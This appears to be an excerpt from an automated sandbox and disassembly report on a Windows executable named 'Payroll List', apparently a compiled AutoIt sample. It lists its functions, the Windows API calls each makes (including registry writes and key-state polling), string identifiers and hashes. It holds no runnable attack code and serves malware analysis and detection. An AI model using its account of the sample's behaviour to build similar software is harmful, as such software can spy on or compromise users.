                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                    • String ID: 0
                                                                    • API String ID: 1073566785-4108050209
                                                                    • Opcode ID: db7baef776f1830123d1e1d251fc8a09dbe03d0932644b5a8571a19362f3a2ba
                                                                    • Instruction ID: eef717cb239ad5634f4c78de041529ffee4ec8f466d0c9eff85f6db07325c933
                                                                    • Opcode Fuzzy Hash: db7baef776f1830123d1e1d251fc8a09dbe03d0932644b5a8571a19362f3a2ba
                                                                    • Instruction Fuzzy Hash: 96E1AF71904219ABDF20EFA5DCC4EEE7BB8FF05714F148156F919AA290D7708A81DF60
                                                                    Function 0018764F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetCursorPos.USER32(?), ref: 0018778A
                                                                    • GetDesktopWindow.USER32 ref: 0018779F
                                                                    • GetWindowRect.USER32(00000000), ref: 001877A6
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00187808
                                                                    • DestroyWindow.USER32(?), ref: 00187834
                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0018785D
                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0018787B
                                                                    • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 001878A1
                                                                    • SendMessageW.USER32(?,00000421,?,?), ref: 001878B6
                                                                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 001878C9
                                                                    • IsWindowVisible.USER32(?), ref: 001878E9
                                                                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00187904
                                                                    • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00187918
                                                                    • GetWindowRect.USER32(?,?), ref: 00187930
                                                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 00187956
                                                                    • GetMonitorInfoW.USER32 ref: 00187970
                                                                    • CopyRect.USER32(?,?), ref: 00187987
                                                                    • SendMessageW.USER32(?,00000412,00000000), ref: 001879F2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                    • String ID: ($0$tooltips_class32
                                                                    • API String ID: 698492251-4156429822
                                                                    • Opcode ID: 70fd286146b1f434bb83e0b7258f16317207324b2cf6f128eade44e14f7cf7d7
                                                                    • Instruction ID: 0e00aa33dabcf1b036d5ff76ae409223f5e45d85accf7fb86f0ec77fe8b99730
                                                                    • Opcode Fuzzy Hash: 70fd286146b1f434bb83e0b7258f16317207324b2cf6f128eade44e14f7cf7d7
                                                                    • Instruction Fuzzy Hash: 78B1B171608300AFDB04EF64D849B6ABBE4FF99314F10891DF59A9B291D770E944CF92
                                                                    Function 00166CE9 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 178COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00166CFB
                                                                    • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00166D21
                                                                    • _wcscpy.LIBCMT ref: 00166D4F
                                                                    • _wcscmp.LIBCMT ref: 00166D5A
                                                                    • _wcscat.LIBCMT ref: 00166D70
                                                                    • _wcsstr.LIBCMT ref: 00166D7B
                                                                    • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00166D97
                                                                    • _wcscat.LIBCMT ref: 00166DE0
                                                                    • _wcscat.LIBCMT ref: 00166DE7
                                                                    • _wcsncpy.LIBCMT ref: 00166E12
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                    • API String ID: 699586101-1459072770
                                                                    • Opcode ID: ac3f3748e6dc4de246139ff46be031b504dc28a79e025aed5618ac9e73fe10d0
                                                                    • Instruction ID: 8ee238f50f6b4f2a6b6abc62c8af1bb0d4aba2ff752076beef32424f468a32ab
                                                                    • Opcode Fuzzy Hash: ac3f3748e6dc4de246139ff46be031b504dc28a79e025aed5618ac9e73fe10d0
                                                                    • Instruction Fuzzy Hash: DB412672A00201BBEB05AB74DC47EBF777CDF65710F04006AF905E2192EB75DA11C6A6
                                                                    Function 0013A856 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0013A939
                                                                    • GetSystemMetrics.USER32(00000007), ref: 0013A941
                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0013A96C
                                                                    • GetSystemMetrics.USER32(00000008), ref: 0013A974
                                                                    • GetSystemMetrics.USER32(00000004), ref: 0013A999
                                                                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0013A9B6
                                                                    • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0013A9C6
                                                                    • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0013A9F9
                                                                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0013AA0D
                                                                    • GetClientRect.USER32(00000000,000000FF), ref: 0013AA2B
                                                                    • GetStockObject.GDI32(00000011), ref: 0013AA47
                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 0013AA52
                                                                      • Part of subcall function 0013B63C: GetCursorPos.USER32(000000FF), ref: 0013B64F
                                                                      • Part of subcall function 0013B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0013B66C
                                                                      • Part of subcall function 0013B63C: GetAsyncKeyState.USER32(00000001), ref: 0013B691
                                                                      • Part of subcall function 0013B63C: GetAsyncKeyState.USER32(00000002), ref: 0013B69F
                                                                    • SetTimer.USER32(00000000,00000000,00000028,0013AB87), ref: 0013AA79
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                    • String ID: AutoIt v3 GUI
                                                                    • API String ID: 1458621304-248962490
                                                                    • Opcode ID: 5df8639216b3f2a9d1f91a7392638982335c38413bdd93a61c888faaa4cf339d
                                                                    • Instruction ID: 3fbd28939df099776572edce81bff1dd5d49a3ae729dfd255157d696fe61859d
                                                                    • Opcode Fuzzy Hash: 5df8639216b3f2a9d1f91a7392638982335c38413bdd93a61c888faaa4cf339d
                                                                    • Instruction Fuzzy Hash: 9AB15A71A0020AAFDF14DFA8DC85BEE7BB4FF08315F114219FA56A7690DB749890CB51
                                                                    Function 00122EC0 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 346COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Foreground
                                                                    • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                    • API String ID: 62970417-1919597938
                                                                    • Opcode ID: e1c52b6778c004e47691143a0a6f1ee2359d9721b9428b63c4c26f5c553021fd
                                                                    • Instruction ID: 78c934fbd8796814e9beea0a3fe742d934ee13d9875af6b7b3b7e9795e7c2000
                                                                    • Opcode Fuzzy Hash: e1c52b6778c004e47691143a0a6f1ee2359d9721b9428b63c4c26f5c553021fd
                                                                    • Instruction Fuzzy Hash: 47D1B730504742BBCF08EF60D9819AEBBB4BF64344F104A1DF45A675A1DB70E9AACB91
                                                                    Function 00183639 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00183735
                                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,001BDC00,00000000,?,00000000,?,?), ref: 001837A3
                                                                    • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 001837EB
                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00183874
                                                                    • RegCloseKey.ADVAPI32(?), ref: 00183B94
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00183BA1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Close$ConnectCreateRegistryValue
                                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                    • API String ID: 536824911-966354055
                                                                    • Opcode ID: 2dabcacfdf42a0a5707670cf00cbdf7d323b7f2a141af68a939479cd6ef2b92a
                                                                    • Instruction ID: 926b90a5ea77c234c0c213ba4f648aba08da7d292c0efc540ebcb8960b61fa37
                                                                    • Opcode Fuzzy Hash: 2dabcacfdf42a0a5707670cf00cbdf7d323b7f2a141af68a939479cd6ef2b92a
                                                                    • Instruction Fuzzy Hash: BF0279752006119FCB14EF28D891A2AB7E5FF99720F04845DF99A9B3A1CB30EE51CF85
                                                                    Function 00186BC9 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 281windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CharUpperBuffW.USER32(?,?), ref: 00186C56
                                                                    • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00186D16
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharMessageSendUpper
                                                                    • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                    • API String ID: 3974292440-719923060
                                                                    • Opcode ID: 3df141cf4ab1b14d02148b57cd6ee6fad665d955a44f04206bb221e9d994fa88
                                                                    • Instruction ID: 605b249cfa066f19ac34c814aa2527aa65c28a8ff7cb8511664559f4c0444c37
                                                                    • Opcode Fuzzy Hash: 3df141cf4ab1b14d02148b57cd6ee6fad665d955a44f04206bb221e9d994fa88
                                                                    • Instruction Fuzzy Hash: 93A17E302043419FCB18FF24D951A6EB3A5BF65314F144969B8AAAB3D2DB30ED19CF91
                                                                    Function 0015CF50 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 0015CF91
                                                                    • __swprintf.LIBCMT ref: 0015D032
                                                                    • _wcscmp.LIBCMT ref: 0015D045
                                                                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0015D09A
                                                                    • _wcscmp.LIBCMT ref: 0015D0D6
                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 0015D10D
                                                                    • GetDlgCtrlID.USER32(?), ref: 0015D15F
                                                                    • GetWindowRect.USER32(?,?), ref: 0015D195
                                                                    • GetParent.USER32(?), ref: 0015D1B3
                                                                    • ScreenToClient.USER32(00000000), ref: 0015D1BA
                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 0015D234
                                                                    • _wcscmp.LIBCMT ref: 0015D248
                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 0015D26E
                                                                    • _wcscmp.LIBCMT ref: 0015D282
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                                    • String ID: %s%u
                                                                    • API String ID: 3119225716-679674701
                                                                    • Opcode ID: ff721ca41fff44370a306bb379297ed6eaeeb66cb614de5a2eadbb73589e8588
                                                                    • Instruction ID: c49f296968c93d83d6b91879d907d1b4e7746a0a4025c066c911cd792d945485
                                                                    • Opcode Fuzzy Hash: ff721ca41fff44370a306bb379297ed6eaeeb66cb614de5a2eadbb73589e8588
                                                                    • Instruction Fuzzy Hash: 5EA1D131204702EFD724DF64E884BEAB7A8FF54355F00851AFDAADA190DB30E959CB91
                                                                    Function 0015D8A7 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetClassNameW.USER32(00000008,?,00000400), ref: 0015D8EB
                                                                    • _wcscmp.LIBCMT ref: 0015D8FC
                                                                    • GetWindowTextW.USER32(00000001,?,00000400), ref: 0015D924
                                                                    • CharUpperBuffW.USER32(?,00000000), ref: 0015D941
                                                                    • _wcscmp.LIBCMT ref: 0015D95F
                                                                    • _wcsstr.LIBCMT ref: 0015D970
                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 0015D9A8
                                                                    • _wcscmp.LIBCMT ref: 0015D9B8
                                                                    • GetWindowTextW.USER32(00000002,?,00000400), ref: 0015D9DF
                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 0015DA28
                                                                    • _wcscmp.LIBCMT ref: 0015DA38
                                                                    • GetClassNameW.USER32(00000010,?,00000400), ref: 0015DA60
                                                                    • GetWindowRect.USER32(00000004,?), ref: 0015DAC9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                    • String ID: @$ThumbnailClass
                                                                    • API String ID: 1788623398-1539354611
                                                                    • Opcode ID: 86c4e9f556d8923a107a92531e2a4df9b9f73e747cad01f7c40ed64c2c16d760
                                                                    • Instruction ID: 6c836f1f18ca04945a0f07f8b3b5f351ce9aa9fe18079125f10b552f5090f088
                                                                    • Opcode Fuzzy Hash: 86c4e9f556d8923a107a92531e2a4df9b9f73e747cad01f7c40ed64c2c16d760
                                                                    • Instruction Fuzzy Hash: 9781B331008305DBDB25DF10E885FAA7BE8EF95319F04846AFD999E096DB30DD49CBA1
                                                                    Function 0015D6F4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: __wcsnicmp
                                                                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                    • API String ID: 1038674560-1810252412
                                                                    • Opcode ID: e212d03a42c62e7ba1765140d9375d4ecf00ff9e978551e7a72759e8dc2bda18
                                                                    • Instruction ID: f7dd8bb6e6b3e25e385041aa1e3d23ce7aa17b35f52b4fa3c538229facdc1488
                                                                    • Opcode Fuzzy Hash: e212d03a42c62e7ba1765140d9375d4ecf00ff9e978551e7a72759e8dc2bda18
                                                                    • Instruction Fuzzy Hash: 0D31BE31644205EADB24EB60ED43EADB3659F34715F20002AF861761E1EBB1AE58C751
                                                                    Function 0015EA9D Relevance: 25.7, APIs: 17, Instructions: 168windowtimeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadIconW.USER32(00000063), ref: 0015EAB0
                                                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0015EAC2
                                                                    • SetWindowTextW.USER32(?,?), ref: 0015EAD9
                                                                    • GetDlgItem.USER32(?,000003EA), ref: 0015EAEE
                                                                    • SetWindowTextW.USER32(00000000,?), ref: 0015EAF4
                                                                    • GetDlgItem.USER32(?,000003E9), ref: 0015EB04
                                                                    • SetWindowTextW.USER32(00000000,?), ref: 0015EB0A
                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0015EB2B
                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0015EB45
                                                                    • GetWindowRect.USER32(?,?), ref: 0015EB4E
                                                                    • SetWindowTextW.USER32(?,?), ref: 0015EBB9
                                                                    • GetDesktopWindow.USER32 ref: 0015EBBF
                                                                    • GetWindowRect.USER32(00000000), ref: 0015EBC6
                                                                    • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0015EC12
                                                                    • GetClientRect.USER32(?,?), ref: 0015EC1F
                                                                    • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0015EC44
                                                                    • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0015EC6F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                    • String ID:
                                                                    • API String ID: 3869813825-0
                                                                    • Opcode ID: 6e839e453af649995523d6eae440ac1e89c32dfbcadd6cd09fc1c178dc2c1652
                                                                    • Instruction ID: de5d559a5e33cb7f0228cca8298cc1b66fbaa1b74c6bbd81cbe84f118ad548a2
                                                                    • Opcode Fuzzy Hash: 6e839e453af649995523d6eae440ac1e89c32dfbcadd6cd09fc1c178dc2c1652
                                                                    • Instruction Fuzzy Hash: 36512B71900709EFDB24DFA8DD89B6EBBF5FF04706F004928E597A69A0D774A948CB10
                                                                    Function 001779B0 Relevance: 25.6, APIs: 17, Instructions: 109COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 001779C6
                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 001779D1
                                                                    • LoadCursorW.USER32(00000000,00007F03), ref: 001779DC
                                                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 001779E7
                                                                    • LoadCursorW.USER32(00000000,00007F01), ref: 001779F2
                                                                    • LoadCursorW.USER32(00000000,00007F81), ref: 001779FD
                                                                    • LoadCursorW.USER32(00000000,00007F88), ref: 00177A08
                                                                    • LoadCursorW.USER32(00000000,00007F80), ref: 00177A13
                                                                    • LoadCursorW.USER32(00000000,00007F86), ref: 00177A1E
                                                                    • LoadCursorW.USER32(00000000,00007F83), ref: 00177A29
                                                                    • LoadCursorW.USER32(00000000,00007F85), ref: 00177A34
                                                                    • LoadCursorW.USER32(00000000,00007F82), ref: 00177A3F
                                                                    • LoadCursorW.USER32(00000000,00007F84), ref: 00177A4A
                                                                    • LoadCursorW.USER32(00000000,00007F04), ref: 00177A55
                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 00177A60
                                                                    • LoadCursorW.USER32(00000000,00007F89), ref: 00177A6B
                                                                    • GetCursorInfo.USER32(?), ref: 00177A7B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Cursor$Load$Info
                                                                    • String ID:
                                                                    • API String ID: 2577412497-0
                                                                    • Opcode ID: 1c1dc0b95af620f5a724fb217d1bdc2eb82af689d6ff503e7339020c21f4e742
                                                                    • Instruction ID: 9545671fb00c3e6fcdc3cadfc01651af9def29dda747d53541cbea7c00515b0a
                                                                    • Opcode Fuzzy Hash: 1c1dc0b95af620f5a724fb217d1bdc2eb82af689d6ff503e7339020c21f4e742
                                                                    • Instruction Fuzzy Hash: B131F2B1D4831A6ADB109FB69C8999FBEF8FF04750F54452AE50DE7280DB78A5008FA1
                                                                    Function 0012C833 Relevance: 25.0, APIs: 7, Strings: 7, Instructions: 479COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0013E968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,0012C8B7,?,00002000,?,?,00000000,?,0012419E,?,?,?,001BDC00), ref: 0013E984
                                                                      • Part of subcall function 0012660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001253B1,?,?,001261FF,?,00000000,00000001,00000000), ref: 0012662F
                                                                    • __wsplitpath.LIBCMT ref: 0012C93E
                                                                      • Part of subcall function 00141DFC: __wsplitpath_helper.LIBCMT ref: 00141E3C
                                                                    • _wcscpy.LIBCMT ref: 0012C953
                                                                    • _wcscat.LIBCMT ref: 0012C968
                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0012C978
